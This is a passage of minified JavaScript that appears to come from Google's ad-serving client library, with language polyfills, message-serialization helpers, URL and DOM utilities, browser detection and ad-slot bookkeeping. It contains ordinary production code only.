a([[g,2],[h,3]]);if(2!=k.get(g)||3!=k.get(h))return!1;k.delete(g);k.set(h,4);return!k.has(g)&&4==k.get(h)}catch(l){return!1}}())return a;var e="$jscomp_hidden_"+Math.random(), f=0;b.prototype.set=function(g,h){if(!d(g))throw Error("Invalid WeakMap key");if(!la(g,e)){var k=new c;ba(g,e,{value:k})}if(!la(g,e))throw Error("WeakMap key fail: "+g);g[e][this.h]=h;return this};b.prototype.get=function(g){return d(g)&&la(g,e)?g[e][this.h]:void 0};b.prototype.has=function(g){return d(g)&&la(g,e)&&la(g[e],this.h)};b.prototype.delete=function(g){return d(g)&&la(g,e)&&la(g[e],this.h)?delete g[e][this.h]:!1};return b},"es6"); ha("Map",function(a){function b(){var h={};return h.L=h.next=h.head=h}function c(h,k){var l=h.h;return ia(function(){if(l){for(;l.head!=h.h;)l=l.L;for(;l.next!=l.head;)return l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;"object"==l||"function"==l?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var m=h.i[l];if(m&&la(h.i,l))for(h=0;h<m.length;h++){var q=m[h];if(k!==k&&q.key!==q.key||k===q.key)return{id:l,list:m,index:h,B:q}}return{id:l,list:m, index:-1,B:void 0}}function e(h){this.i={};this.h=b();this.size=0;if(h){h=u(h);for(var k;!(k=h.next()).done;)k=k.value,this.set(k[0],k[1])}}if(function(){if(!a||"function"!=typeof a||!a.prototype.entries||"function"!=typeof Object.seal)return!1;try{var h=Object.seal({x:4}),k=new a(u([[h,"s"]]));if("s"!=k.get(h)||1!=k.size||k.get({x:4})||k.set({x:4},"t")!=k||2!=k.size)return!1;var l=k.entries(),m=l.next();if(m.done||m.value[0]!=h||"s"!=m.value[1])return!1;m=l.next();return m.done||4!=m.value[0].x|| "t"!=m.value[1]||!l.next().done?!1:!0}catch(q){return!1}}())return a;var f=new p.WeakMap;e.prototype.set=function(h,k){h=0===h?0:h;var l=d(this,h);l.list||(l.list=this.i[l.id]=[]);l.B?l.B.value=k:(l.B={next:this.h,L:this.h.L,head:this.h,key:h,value:k},l.list.push(l.B),this.h.L.next=l.B,this.h.L=l.B,this.size++);return this};e.prototype.delete=function(h){h=d(this,h);return h.B&&h.list?(h.list.splice(h.index,1),h.list.length||delete this.i[h.id],h.B.L.next=h.B.next,h.B.next.L=h.B.L,h.B.head=null,this.size--, !0):!1};e.prototype.clear=function(){this.i={};this.h=this.h.L=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).B};e.prototype.get=function(h){return(h=d(this,h).B)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})};e.prototype.keys=function(){return c(this,function(h){return h.key})};e.prototype.values=function(){return c(this,function(h){return h.value})};e.prototype.forEach=function(h,k){for(var l=this.entries(),m;!(m=l.next()).done;)m=m.value, h.call(k,m[1],m[0],this)};e.prototype[r(p.Symbol,"iterator")]=e.prototype.entries;var g=0;return e},"es6");function ua(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[r(p.Symbol,"iterator")]=function(){return e};return e} ha("String.prototype.startsWith",function(a){return a?a:function(b,c){if(null==this)throw new TypeError("The 'this' value for String.prototype.startsWith must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype.startsWith must not be a regular expression");var d=this.length,e=b.length;c=Math.max(0,Math.min(c|0,this.length));for(var f=0;f<e&&c<d;)if(this[c++]!=b[f++])return!1;return f>=e}},"es6");ha("globalThis",function(a){return a||da},"es_2020"); ha("Set",function(a){function b(c){this.h=new p.Map;if(c){c=u(c);for(var d;!(d=c.next()).done;)this.add(d.value)}this.size=this.h.size}if(function(){if(!a||"function"!=typeof a||!a.prototype.entries||"function"!=typeof Object.seal)return!1;try{var c=Object.seal({x:4}),d=new a(u([c]));if(!d.has(c)||1!=d.size||d.add(c)!=d||1!=d.size||d.add({x:4})!=d||2!=d.size)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||4!=f.value[0].x|| f.value[1]!=f.value[0]?!1:e.next().done}catch(g){return!1}}())return a;b.prototype.add=function(c){c=0===c?0:c;this.h.set(c,c);this.size=this.h.size;return this};b.prototype.delete=function(c){c=this.h.delete(c);this.size=this.h.size;return c};b.prototype.clear=function(){this.h.clear();this.size=0};b.prototype.has=function(c){return this.h.has(c)};b.prototype.entries=function(){return this.h.entries()};b.prototype.values=function(){return r(this.h,"values").call(this.h)};b.prototype.keys=r(b.prototype, "values");b.prototype[r(p.Symbol,"iterator")]=r(b.prototype,"values");b.prototype.forEach=function(c,d){var e=this;this.h.forEach(function(f){return c.call(d,f,f,e)})};return b},"es6");ha("Array.prototype.keys",function(a){return a?a:function(){return ua(this,function(b){return b})}},"es6");ha("Array.prototype.values",function(a){return a?a:function(){return ua(this,function(b,c){return c})}},"es8");ha("Number.isNaN",function(a){return a?a:function(b){return"number"===typeof b&&isNaN(b)}},"es6"); ha("Promise.prototype.finally",function(a){return a?a:function(b){return this.then(function(c){return p.Promise.resolve(b()).then(function(){return c})},function(c){return p.Promise.resolve(b()).then(function(){throw c;})})}},"es9");var w=this||self;function va(a){a=a.split(".");for(var b=w,c=0;c<a.length;c++)if(b=b[a[c]],null==b)return null;return b}function wa(a){var b=typeof a;return"object"!=b?b:a?Array.isArray(a)?"array":b:"null"} function xa(a){var b=wa(a);return"array"==b||"object"==b&&"number"==typeof a.length}function ya(a){var b=typeof a;return"object"==b&&null!=a||"function"==b}function za(a){return Object.prototype.hasOwnProperty.call(a,Aa)&&a[Aa]||(a[Aa]=++Ba)}var Aa="closure_uid_"+(1E9*Math.random()>>>0),Ba=0;function Ca(a,b,c){return a.call.apply(a.bind,arguments)} function Da(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}}function Ea(a,b,c){Function.prototype.bind&&-1!=Function.prototype.bind.toString().indexOf("native code")?Ea=Ca:Ea=Da;return Ea.apply(null,arguments)} function Fa(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}}function Ga(a){var b=["__uspapi"],c=w;b[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+b[0]);for(var d;b.length&&(d=b.shift());)b.length||void 0===a?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=a}function Ha(a){return a};var Ia=(new Date).getTime();function Ja(a){return/^[\s\xa0]*([\s\S]*?)[\s\xa0]*$/.exec(a)[1]} function Ka(a,b){var c=0;a=Ja(String(a)).split(".");b=Ja(String(b)).split(".");for(var d=Math.max(a.length,b.length),e=0;0==c&&e<d;e++){var f=a[e]||"",g=b[e]||"";do{f=/(\d*)(\D*)(.*)/.exec(f)||["","","",""];g=/(\d*)(\D*)(.*)/.exec(g)||["","","",""];if(0==f[0].length&&0==g[0].length)break;c=La(0==f[1].length?0:parseInt(f[1],10),0==g[1].length?0:parseInt(g[1],10))||La(0==f[2].length,0==g[2].length)||La(f[2],g[2]);f=f[3];g=g[3]}while(0==c)}return c}function La(a,b){return a<b?-1:a>b?1:0};function Ma(){var a=w.navigator;return a&&(a=a.userAgent)?a:""}function x(a){return-1!=Ma().indexOf(a)};function Na(){return x("Trident")||x("MSIE")}function Oa(){return(x("Chrome")||x("CriOS"))&&!x("Edge")||x("Silk")}function Pa(a){var b={};a.forEach(function(c){b[c[0]]=c[1]});return function(c){return b[r(c,"find").call(c,function(d){return d in b})]||""}} function Qa(){var a=Ma();if(Na()){var b=/rv: *([\d\.]*)/.exec(a);if(b&&b[1])a=b[1];else{b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),"7.0"==c[1])if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "5.0":b="9.0";break;case "6.0":b="10.0";break;case "7.0":b="11.0"}else b="7.0";else b=c[1];a=b}return a}c=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s*(?:\\((.*?)\\))?","g");b=[];for(var d;d=c.exec(a);)b.push([d[1],d[2],d[3]||void 0]);a=Pa(b);return x("Opera")?a(["Version","Opera"]): x("Edge")?a(["Edge"]):x("Edg/")?a(["Edg"]):x("Silk")?a(["Silk"]):Oa()?a(["Chrome","CriOS","HeadlessChrome"]):(a=b[2])&&a[1]||""};function Ra(a,b){for(var c=a.length,d="string"===typeof a?a.split(""):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function Sa(a,b){for(var c=a.length,d=[],e=0,f="string"===typeof a?a.split(""):a,g=0;g<c;g++)if(g in f){var h=f[g];b.call(void 0,h,g,a)&&(d[e++]=h)}return d}function Ta(a,b){for(var c=a.length,d=Array(c),e="string"===typeof a?a.split(""):a,f=0;f<c;f++)f in e&&(d[f]=b.call(void 0,e[f],f,a));return d} function Ua(a,b){for(var c=a.length,d="string"===typeof a?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;return!1}function Va(a,b){a:{for(var c=a.length,d="string"===typeof a?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a)){b=e;break a}b=-1}return 0>b?null:"string"===typeof a?a.charAt(b):a[b]} function Wa(a,b){a:{for(var c="string"===typeof a?a.split(""):a,d=a.length-1;0<=d;d--)if(d in c&&b.call(void 0,c[d],d,a)){b=d;break a}b=-1}return 0>b?null:"string"===typeof a?a.charAt(b):a[b]}function Xa(a,b){a:if("string"===typeof a)a="string"!==typeof b||1!=b.length?-1:a.indexOf(b,0);else{for(var c=0;c<a.length;c++)if(c in a&&a[c]===b){a=c;break a}a=-1}return 0<=a}function Ya(a){var b=a.length;if(0<b){for(var c=Array(b),d=0;d<b;d++)c[d]=a[d];return c}return[]};function Za(a){Za[" "](a);return a}Za[" "]=function(){};var $a=Na();!x("Android")||Oa();Oa();!x("Safari")||Oa();var ab={},bb=null;var cb="undefined"!==typeof Uint8Array;var db="function"===typeof p.Symbol&&"symbol"===typeof(0,p.Symbol)()?(0,p.Symbol)(void 0):void 0;function eb(a,b){Object.isFrozen(a)||(db?a[db]|=b:void 0!==a.ma?a.ma|=b:Object.defineProperties(a,{ma:{value:b,configurable:!0,writable:!0,enumerable:!1}}))}function fb(a){var b;db?b=a[db]:b=a.ma;return null==b?0:b}function gb(a){eb(a,1);return a}function hb(a){return Array.isArray(a)?!!(fb(a)&2):!1}function ib(a){if(!Array.isArray(a))throw Error("cannot mark non-array as immutable");eb(a,2)};function jb(a){return null!==a&&"object"===typeof a&&!Array.isArray(a)&&a.constructor===Object}var kb,lb=Object.freeze(gb([]));function mb(a){if(hb(a.v))throw Error("Cannot mutate an immutable Message");}var nb="undefined"!=typeof p.Symbol&&"undefined"!=typeof p.Symbol.hasInstance;function ob(a){return{value:a,configurable:!1,writable:!1,enumerable:!1}};function pb(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "object":if(a&&!Array.isArray(a)&&cb&&null!=a&&a instanceof Uint8Array){var b;void 0===b&&(b=0);if(!bb){bb={};for(var c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".split(""),d=["+/=","+/","-_=","-_.","-_"],e=0;5>e;e++){var f=c.concat(d[e].split(""));ab[e]=f;for(var g=0;g<f.length;g++){var h=f[g];void 0===bb[h]&&(bb[h]=g)}}}b=ab[b];c=Array(Math.floor(a.length/3));d=b[64]||"";for(e=f=0;f<a.length- 2;f+=3){var k=a[f],l=a[f+1];h=a[f+2];g=b[k>>2];k=b[(k&3)<<4|l>>4];l=b[(l&15)<<2|h>>6];h=b[h&63];c[e++]=g+k+l+h}g=0;h=d;switch(a.length-f){case 2:g=a[f+1],h=b[(g&15)<<2]||d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4|g>>4]+h+d}return c.join("")}}return a};function qb(a){var b=sb;b=void 0===b?tb:b;return ub(a,b)}function vb(a,b){if(null!=a){if(Array.isArray(a))a=ub(a,b);else if(jb(a)){var c={},d;for(d in a)Object.prototype.hasOwnProperty.call(a,d)&&(c[d]=vb(a[d],b));a=c}else a=b(a);return a}}function ub(a,b){for(var c=a.slice(),d=0;d<c.length;d++)c[d]=vb(c[d],b);Array.isArray(a)&&fb(a)&1&&gb(c);return c}function sb(a){if(a&&"object"==typeof a&&a.toJSON)return a.toJSON();a=pb(a);return Array.isArray(a)?qb(a):a} function tb(a){return cb&&null!=a&&a instanceof Uint8Array?new Uint8Array(a):a};function A(a,b,c){return-1===b?null:b>=a.l?a.i?a.i[b]:void 0:(void 0===c?0:c)&&a.i&&(c=a.i[b],null!=c)?c:a.v[b+a.j]}function B(a,b,c,d,e){d=void 0===d?!1:d;(void 0===e?0:e)||mb(a);b<a.l&&!d?a.v[b+a.j]=c:(a.i||(a.i=a.v[a.l+a.j]={}))[b]=c;return a}function wb(a,b,c,d){c=void 0===c?!0:c;d=void 0===d?!1:d;var e=A(a,b,d);null==e&&(e=lb);if(hb(a.v))c&&(ib(e),Object.freeze(e));else if(e===lb||hb(e))e=gb(e.slice()),B(a,b,e,d);return e}function xb(a,b){a=A(a,b);return null==a?a:!!a} function C(a,b,c){a=A(a,b);return null==a?c:a}function D(a,b,c){a=xb(a,b);return null==a?void 0===c?!1:c:a}function yb(a,b){a=A(a,b);a=null==a?a:+a;return null==a?0:a}function zb(a,b,c){var d=void 0===d?!1:d;return B(a,b,null==c?gb([]):Array.isArray(c)?gb(c):c,d)}function Ab(a,b,c){mb(a);0!==c?B(a,b,c):B(a,b,void 0,!1,!1);return a}function Bb(a,b,c,d){mb(a);(c=Cb(a,c))&&c!==b&&null!=d&&(a.h&&c in a.h&&(a.h[c]=void 0),B(a,c));return B(a,b,d)}function Db(a,b,c){return Cb(a,b)===c?c:-1} function Cb(a,b){for(var c=0,d=0;d<b.length;d++){var e=b[d];null!=A(a,e)&&(0!==c&&B(a,c,void 0,!1,!0),c=e)}return c}function G(a,b,c){if(-1===c)return null;a.h||(a.h={});var d=a.h[c];if(d)return d;var e=A(a,c,!1);if(null==e)return d;b=new b(e);hb(a.v)&&ib(b.v);return a.h[c]=b}function H(a,b,c){a.h||(a.h={});var d=hb(a.v),e=a.h[c];if(!e){var f=wb(a,c,!0,!1);e=[];d=d||hb(f);for(var g=0;g<f.length;g++)e[g]=new b(f[g]),d&&ib(e[g].v);d&&(ib(e),Object.freeze(e));a.h[c]=e}return e} function Eb(a,b,c){var d=void 0===d?!1:d;mb(a);a.h||(a.h={});var e=c?c.v:c;a.h[b]=c;return B(a,b,e,d)}function Fb(a,b,c,d){mb(a);a.h||(a.h={});var e=d?d.v:d;a.h[b]=d;return Bb(a,b,c,e)}function Gb(a,b,c){var d=void 0===d?!1:d;mb(a);if(c){var e=gb([]);for(var f=0;f<c.length;f++)e[f]=c[f].v;a.h||(a.h={});a.h[b]=c}else a.h&&(a.h[b]=void 0),e=lb;return B(a,b,e,d)}function I(a,b){return C(a,b,"")}function Hb(a,b,c){return C(a,Db(a,c,b),0)}function Ib(a,b,c,d){return G(a,b,Db(a,d,c))};function Jb(a,b,c){a||(a=Kb);Kb=null;var d=this.constructor.messageId;a||(a=d?[d]:[]);this.j=(d?0:-1)-(this.constructor.h||0);this.h=void 0;this.v=a;a:{d=this.v.length;a=d-1;if(d&&(d=this.v[a],jb(d))){this.l=a-this.j;this.i=d;break a}void 0!==b&&-1<b?(this.l=Math.max(b,a+1-this.j),this.i=void 0):this.l=Number.MAX_VALUE}if(c)for(b=0;b<c.length;b++)if(a=c[b],a<this.l)a+=this.j,(d=this.v[a])?Array.isArray(d)&&gb(d):this.v[a]=lb;else{d=this.i||(this.i=this.v[this.l+this.j]={});var e=d[a];e?Array.isArray(e)&& gb(e):d[a]=lb}}Jb.prototype.toJSON=function(){var a=this.v;return kb?a:qb(a)};function Lb(a){kb=!0;try{return JSON.stringify(a.toJSON(),Mb)}finally{kb=!1}}function Nb(a,b){if(null==b||""==b)return new a;b=JSON.parse(b);if(!Array.isArray(b))throw Error("Expected to deserialize an Array but got "+wa(b)+": "+b);Kb=b;a=new a(b);Kb=null;return a}function Mb(a,b){return pb(b)}var Kb;function Ob(){Jb.apply(this,arguments)}v(Ob,Jb);if(nb){var Pb={};Object.defineProperties(Ob,(Pb[p.Symbol.hasInstance]=ob(function(){throw Error("Cannot perform instanceof checks for MutableMessage");}),Pb))};function J(){Ob.apply(this,arguments)}v(J,Ob);if(nb){var Qb={};Object.defineProperties(J,(Qb[p.Symbol.hasInstance]=ob(Object[p.Symbol.hasInstance]),Qb))};function Rb(a){J.call(this,a,-1,Sb)}v(Rb,J);function Tb(a){J.call(this,a)}v(Tb,J);var Sb=[2,3];function Ub(a,b){this.i=a===Vb&&b||"";this.h=Wb}var Wb={},Vb={};function Xb(a,b){var c={},d;for(d in a)b.call(void 0,a[d],d,a)&&(c[d]=a[d]);return c}function Yb(a,b){for(var c in a)if(b.call(void 0,a[c],c,a))return!0;return!1}function Zb(a){var b=[],c=0,d;for(d in a)b[c++]=a[d];return b}function $b(a){var b={},c;for(c in a)b[c]=a[c];return b};var ac;function bc(){if(void 0===ac){var a=null,b=w.trustedTypes;if(b&&b.createPolicy){try{a=b.createPolicy("goog#html",{createHTML:Ha,createScript:Ha,createScriptURL:Ha})}catch(c){w.console&&w.console.error(c.message)}ac=a}else ac=a}return ac};function cc(a,b){this.h=b===dc?a:""}function ec(a,b){a=fc.exec(gc(a).toString());var c=a[3]||"";return hc(a[1]+ic("?",a[2]||"",b)+ic("#",c))}cc.prototype.toString=function(){return this.h+""};function gc(a){return a instanceof cc&&a.constructor===cc?a.h:"type_error:TrustedResourceUrl"}var fc=/^([^?#]*)(\?[^#]*)?(#[\s\S]*)?/,dc={};function hc(a){var b=bc();a=b?b.createScriptURL(a):a;return new cc(a,dc)} function ic(a,b,c){if(null==c)return b;if("string"===typeof c)return c?a+encodeURIComponent(c):"";for(var d in c)if(Object.prototype.hasOwnProperty.call(c,d)){var e=c[d];e=Array.isArray(e)?e:[e];for(var f=0;f<e.length;f++){var g=e[f];null!=g&&(b||(b=a),b+=(b.length>a.length?"&":"")+encodeURIComponent(d)+"="+encodeURIComponent(String(g)))}}return b};function jc(a,b){this.h=b===kc?a:""}jc.prototype.toString=function(){return this.h.toString()};var kc={};/* SPDX-License-Identifier: Apache-2.0 */ var lc={};function mc(){}function nc(a){this.h=a}v(nc,mc);nc.prototype.toString=function(){return this.h.toString()};function oc(a){var b,c=null==(b=bc())?void 0:b.createScriptURL(a);return new nc(null!=c?c:a,lc)}function pc(a){if(a instanceof nc)return a.h;throw Error("");};function qc(a){return a instanceof mc?pc(a):gc(a)}function rc(a){return a instanceof jc&&a.constructor===jc?a.h:"type_error:SafeUrl"}function sc(a){return a instanceof mc?pc(a).toString():gc(a).toString()};var tc="alternate author bookmark canonical cite help icon license next prefetch dns-prefetch prerender preconnect preload prev search subresource".split(" ");function uc(a){return function(){return!a.apply(this,arguments)}}function vc(a){var b=!1,c;return function(){b||(c=a(),b=!0);return c}}function wc(a){var b=a;return function(){if(b){var c=b;b=null;c()}}};function xc(a,b,c){a.addEventListener&&a.addEventListener(b,c,!1)}function yc(a,b){a.removeEventListener&&a.removeEventListener("message",b,!1)};function zc(a){return String(a).replace(/\-([a-z])/g,function(b,c){return c.toUpperCase()})};function Ac(a,b,c){function d(h){h&&b.appendChild("string"===typeof h?a.createTextNode(h):h)}for(var e=1;e<c.length;e++){var f=c[e];if(!xa(f)||ya(f)&&0<f.nodeType)d(f);else{a:{if(f&&"number"==typeof f.length){if(ya(f)){var g="function"==typeof f.item||"string"==typeof f.item;break a}if("function"===typeof f){g="function"==typeof f.item;break a}}g=!1}Ra(g?Ya(f):f,d)}}}function Bc(a){this.h=a||w.document||document}n=Bc.prototype;n.getElementsByTagName=function(a,b){return(b||this.h).getElementsByTagName(String(a))}; n.createElement=function(a){var b=this.h;a=String(a);"application/xhtml+xml"===b.contentType&&(a=a.toLowerCase());return b.createElement(a)};n.createTextNode=function(a){return this.h.createTextNode(String(a))};n.append=function(a,b){Ac(9==a.nodeType?a:a.ownerDocument||a.document,a,arguments)}; n.contains=function(a,b){if(!a||!b)return!1;if(a.contains&&1==b.nodeType)return a==b||a.contains(b);if("undefined"!=typeof a.compareDocumentPosition)return a==b||!!(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a};function Cc(){return!Dc()&&(x("iPod")||x("iPhone")||x("Android")||x("IEMobile"))}function Dc(){return x("iPad")||x("Android")&&!x("Mobile")||x("Silk")};var Ec=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^\\\\/?#]*)@)?([^\\\\/?#]*?)(?::([0-9]+))?(?=[\\\\/?#]|$))?([^?#]+)?(?:\\?([^#]*))?(?:#([\\s\\S]*))?$"),Fc=/#|$/;function Gc(a){var b=a.search(Fc),c;a:{for(c=0;0<=(c=a.indexOf("client",c))&&c<b;){var d=a.charCodeAt(c-1);if(38==d||63==d)if(d=a.charCodeAt(c+6),!d||61==d||38==d||35==d)break a;c+=7}c=-1}if(0>c)return null;d=a.indexOf("&",c);if(0>d||d>b)d=b;c+=7;return decodeURIComponent(a.substr(c,d-c).replace(/\+/g," "))};function Hc(a){try{var b;if(b=!!a&&null!=a.location.href)a:{try{Za(a.foo);b=!0;break a}catch(c){}b=!1}return b}catch(c){return!1}}function Ic(a){return Hc(a.top)?a.top:null} function Lc(a,b){var c=Mc("SCRIPT",a);c.src=qc(b);var d,e;(d=(b=null==(e=(d=(c.ownerDocument&&c.ownerDocument.defaultView||window).document).querySelector)?void 0:e.call(d,"script[nonce]"))?b.nonce||b.getAttribute("nonce")||"":"")&&c.setAttribute("nonce",d);return(a=a.getElementsByTagName("script")[0])&&a.parentNode?(a.parentNode.insertBefore(c,a),c):null}function Nc(a,b){return b.getComputedStyle?b.getComputedStyle(a,null):a.currentStyle} function Oc(a,b){if(!Pc()&&!Qc()){var c=Math.random();if(c<b)return c=Rc(),a[Math.floor(c*a.length)]}return null}function Rc(){if(!p.globalThis.crypto)return Math.random();try{var a=new Uint32Array(1);p.globalThis.crypto.getRandomValues(a);return a[0]/65536/65536}catch(b){return Math.random()}}function Sc(a,b){if(a)for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b(a[c],c,a)} function Tc(a){var b=a.length;if(0==b)return 0;for(var c=305419896,d=0;d<b;d++)c^=(c<<5)+(c>>2)+a.charCodeAt(d)&4294967295;return 0<c?c:4294967296+c}var Qc=vc(function(){return Ua(["Google Web Preview","Mediapartners-Google","Google-Read-Aloud","Google-Adwords"],Uc)||1E-4>Math.random()});function Vc(a,b){var c=-1;try{a&&(c=parseInt(a.getItem(b),10))}catch(d){return null}return 0<=c&&1E3>c?c:null} function Wc(a,b){var c=Qc()?null:Math.floor(1E3*Rc());var d;if(d=null!=c&&a)a:{var e=String(c);try{if(a){a.setItem(b,e);d=e;break a}}catch(f){}d=null}return d?c:null}var Pc=vc(function(){return Uc("MSIE")});function Uc(a){return-1!=Ma().indexOf(a)}var Xc=/^([0-9.]+)px$/,Yc=/^(-?[0-9.]{1,30})$/;function Zc(a){var b=void 0===b?null:b;if(!Yc.test(a))return b;a=Number(a);return isNaN(a)?b:a}function K(a){return(a=Xc.exec(a))?+a[1]:null} function $c(a,b){for(var c=0;50>c;++c){try{var d=!(!a.frames||!a.frames[b])}catch(g){d=!1}if(d)return a;a:{try{var e=a.parent;if(e&&e!=a){var f=e;break a}}catch(g){}f=null}if(!(a=f))break}return null}var ad=vc(function(){return Cc()?2:Dc()?1:0});function bd(a){Sc({display:"none"},function(b,c){a.style.setProperty(c,b,"important")})}var cd=[];function dd(){var a=cd;cd=[];a=u(a);for(var b=a.next();!b.done;b=a.next()){b=b.value;try{b()}catch(c){}}} function ed(a,b){0!=a.length&&b.head&&a.forEach(function(c){if(c&&c&&b.head){var d=Mc("META");b.head.appendChild(d);d.httpEquiv="origin-trial";d.content=c}})}function fd(a){if("number"!==typeof a.goog_pvsid)try{Object.defineProperty(a,"goog_pvsid",{value:Math.floor(Math.random()*Math.pow(2,52)),configurable:!1})}catch(b){}return Number(a.goog_pvsid)||-1} function gd(a){var b=hd;"complete"===b.readyState||"interactive"===b.readyState?(cd.push(a),1==cd.length&&(p.Promise?p.Promise.resolve().then(dd):window.setImmediate?setImmediate(dd):setTimeout(dd,0))):b.addEventListener("DOMContentLoaded",a)}function Mc(a,b){b=void 0===b?document:b;return b.createElement(String(a).toLowerCase())};var id=null;var hd=document,L=window;var jd=null;function kd(a,b){b=void 0===b?[]:b;var c=!1;w.google_logging_queue||(c=!0,w.google_logging_queue=[]);w.google_logging_queue.push([a,b]);if(a=c){if(null==jd){jd=!1;try{var d=Ic(w);d&&-1!==d.location.hash.indexOf("google_logging")&&(jd=!0);w.localStorage.getItem("google_logging")&&(jd=!0)}catch(e){}}a=jd}a&&(d=w.document,a=new Ub(Vb,"https://pagead2.googlesyndication.com/pagead/js/logging_library.js"),a=hc(a instanceof Ub&&a.constructor===Ub&&a.h===Wb?a.i:"type_error:Const"),Lc(d,a))};function ld(a){a=void 0===a?w:a;var b=a.context||a.AMP_CONTEXT_DATA;if(!b)try{b=a.parent.context||a.parent.AMP_CONTEXT_DATA}catch(c){}try{if(b&&b.pageViewId&&b.canonicalUrl)return b}catch(c){}return null}function md(a){return(a=a||ld())?Hc(a.master)?a.master:null:null};function nd(a){var b=ta.apply(1,arguments);if(0===b.length)return oc(a[0]);for(var c=[a[0]],d=0;d<b.length;d++)c.push(encodeURIComponent(b[d])),c.push(a[d+1]);return oc(c.join(""))};function od(a){var b=void 0===b?1:b;a=md(ld(a))||a;a.google_unique_id=(a.google_unique_id||0)+b;return a.google_unique_id}function pd(a){a=a.google_unique_id;return"number"===typeof a?a:0}function qd(){var a=void 0===a?L:a;if(!a)return!1;try{return!(!a.navigator.standalone&&!a.top.navigator.standalone)}catch(b){return!1}}function rd(a){if(!a)return"";a=a.toLowerCase();"ca-"!=a.substring(0,3)&&(a="ca-"+a);return a};function sd(){this.i=new td(this);this.h=0}sd.prototype.resolve=function(a){ud(this);this.h=1;this.l=a;vd(this.i)};sd.prototype.reject=function(a){ud(this);this.h=2;this.j=a;vd(this.i)};function ud(a){if(0!=a.h)throw Error("Already resolved/rejected.");}function td(a){this.h=a}td.prototype.then=function(a,b){if(this.i)throw Error("Then functions already set.");this.i=a;this.j=b;vd(this)}; function vd(a){switch(a.h.h){case 0:break;case 1:a.i&&a.i(a.h.l);break;case 2:a.j&&a.j(a.h.j);break;default:throw Error("Unhandled deferred state.");}};function wd(a){this.h=a.slice(0)}n=wd.prototype;n.forEach=function(a){var b=this;this.h.forEach(function(c,d){return void a(c,d,b)})};n.filter=function(a){return new wd(Sa(this.h,a))};n.apply=function(a){return new wd(a(this.h.slice(0)))};n.sort=function(a){return new wd(this.h.slice(0).sort(a))};n.get=function(a){return this.h[a]};n.add=function(a){var b=this.h.slice(0);b.push(a);return new wd(b)};function xd(a,b){for(var c=[],d=a.length,e=0;e<d;e++)c.push(a[e]);c.forEach(b,void 0)};function yd(){this.h={};this.i={}}yd.prototype.set=function(a,b){var c=zd(a);this.h[c]=b;this.i[c]=a};yd.prototype.get=function(a,b){a=zd(a);return void 0!==this.h[a]?this.h[a]:b};yd.prototype.clear=function(){this.h={};this.i={}};function zd(a){return a instanceof Object?String(za(a)):a+""};function Ad(a,b){this.h=a;this.i=b}function Bd(a){return null!=a.h?a.h.value:null}function Cd(a,b){null!=a.h&&b(a.h.value);return a}Ad.prototype.map=function(a){return null!=this.h?(a=a(this.h.value),a instanceof Ad?a:Dd(a)):this};function Ed(a,b){null!=a.h||b(a.i);return a}function Dd(a){return new Ad({value:a},null)}function Fd(a){return new Ad(null,a)}function Gd(a){try{return Dd(a())}catch(b){return Fd(b)}};function Hd(a){this.h=new yd;if(a)for(var b=0;b<a.length;++b)this.add(a[b])}Hd.prototype.add=function(a){this.h.set(a,!0)};Hd.prototype.contains=function(a){return void 0!==this.h.h[zd(a)]};function Id(){this.h=new yd}Id.prototype.set=function(a,b){var c=this.h.get(a);c||(c=new Hd,this.h.set(a,c));c.add(b)};function Jd(a){J.call(this,a,-1,Kd)}v(Jd,J);Jd.prototype.getId=function(){return A(this,3)};var Kd=[4];function Ld(a){var b=void 0===a.Ga?void 0:a.Ga,c=void 0===a.gb?void 0:a.gb,d=void 0===a.Ra?void 0:a.Ra;this.h=void 0===a.bb?void 0:a.bb;this.l=new wd(b||[]);this.j=d;this.i=c};function Md(a){var b=[],c=a.l;c&&c.h.length&&b.push({X:"a",ca:Nd(c)});null!=a.h&&b.push({X:"as",ca:a.h});null!=a.i&&b.push({X:"i",ca:String(a.i)});null!=a.j&&b.push({X:"rp",ca:String(a.j)});b.sort(function(d,e){return d.X.localeCompare(e.X)});b.unshift({X:"t",ca:"aa"});return b}function Nd(a){a=a.h.slice(0).map(Od);a=JSON.stringify(a);return Tc(a)}function Od(a){var b={};null!=A(a,7)&&(b.q=A(a,7));null!=A(a,2)&&(b.o=A(a,2));null!=A(a,5)&&(b.p=A(a,5));return b};function Pd(a){J.call(this,a)}v(Pd,J);Pd.prototype.setLocation=function(a){return B(this,1,a)};function Qd(a,b){this.Ja=a;this.Qa=b}function Rd(a){var b=[].slice.call(arguments).filter(uc(function(e){return null===e}));if(!b.length)return null;var 